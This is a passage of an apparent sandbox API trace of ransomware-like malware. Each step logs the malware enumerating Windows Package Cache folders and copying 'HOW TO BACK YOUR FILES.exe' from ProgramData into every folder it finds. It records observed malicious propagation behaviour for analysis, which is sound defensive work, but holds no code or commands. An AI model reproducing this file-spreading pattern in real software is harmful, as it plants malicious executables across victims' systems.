cAlternateFileName="")) returned 0x2ccee8 [0090.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.472] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0090.472] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0090.472] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.472] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.472] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.473] GetLastError () returned 0x0 [0090.473] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.473] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.473] CloseHandle (hObject=0x120) returned 1 [0090.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.473] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5f248fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f248fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.473] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.473] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0090.473] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0090.473] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.474] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.474] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.474] GetLastError () returned 0x0 [0090.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.474] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.474] CloseHandle (hObject=0x120) returned 1 [0090.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.475] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.475] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.475] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0090.475] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0090.475] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.475] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.476] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.476] GetLastError () returned 0x0 [0090.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.476] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.476] CloseHandle (hObject=0x120) returned 1 [0090.476] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.476] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.476] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.476] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.477] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0090.477] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0090.477] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.477] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.477] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.478] GetLastError () returned 0x0 [0090.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.478] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.478] CloseHandle (hObject=0x120) returned 1 [0090.478] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.478] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5f8fada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f8fada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.478] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.478] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.478] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0090.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0090.478] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.478] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.479] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.479] GetLastError () returned 0x0 [0090.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.479] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.479] CloseHandle (hObject=0x120) returned 1 [0090.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.480] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.480] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.480] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.480] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0090.480] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0090.480] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.480] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.481] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.481] GetLastError () returned 0x0 [0090.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.481] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.481] CloseHandle (hObject=0x120) returned 1 [0090.481] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.481] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.481] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.481] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.481] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0090.482] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0090.482] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.482] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.482] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.482] GetLastError () returned 0x0 [0090.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.482] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.483] CloseHandle (hObject=0x120) returned 1 [0090.483] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.483] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5fac3e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fac3e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.483] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.483] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.483] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0090.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0090.483] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.483] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.484] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.484] GetLastError () returned 0x0 [0090.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.484] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.484] CloseHandle (hObject=0x120) returned 1 [0090.484] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.484] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, 